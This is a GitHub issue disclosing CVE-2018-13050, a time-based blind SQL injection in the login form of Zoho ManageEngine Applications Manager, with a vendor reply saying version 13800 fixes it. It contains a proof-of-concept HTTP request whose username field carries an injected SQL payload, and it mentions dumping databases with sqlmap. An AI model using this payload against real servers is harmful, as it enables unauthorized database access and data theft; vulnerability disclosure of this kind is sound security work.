Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[CVE-2018-13050]Zoho manageengine Applications Manager SQL Injection vulnerability #1

Open
x-f1v3 opened this issue Jul 2, 2018 · 1 comment

Comments

@x-f1v3
Copy link
Owner

x-f1v3 commented Jul 2, 2018

Zoho manageengine Applications Manager SQL Injection vulnerability

Date: 2018/07/02
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: jacky.xing@dbappsecurity.com.cn
CVE: CVE-2018-13050

Proof of Concept:

POST /j_security_check HTTP/1.1
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:9090/
Cookie: JSESSIONID_APM_9090=CFE9FA9A1A9EF400DC88681BF3F580F4; testcookie=; am_username=; am_check=
Host: 127.0.0.1:9090
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

submit=Login&clienttype=html&j_password=g00dPa%24%24w0rD&j_username=5mwETOWO';select%20pg_sleep(0);%20--%20&remember=on&ScreenHeight=709&ScreenWidth=1280&username=rrkfpycm&webstart=

This is a time-based blind SQL Injection vulnerability .So I use sqlmap to exploit it .The following is a proof screenshot.
image
Databases:
image
User:
image
Table:
image
data:
image

@x-f1v3 x-f1v3 changed the title Zoho manageengine Applications Manager SQL Injection vulnerability [CVE-2018-13050]Zoho manageengine Applications Manager SQL Injection vulnerability Jul 3, 2018
@Priyankaroy93
Copy link

We apologise for the inconvenience this may have caused to our customers.
These issues were fixed in July itself, with the release of version 13800. Please upgrade to the latest version from here: http://bit.ly/APMDownload

ManageEngine

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants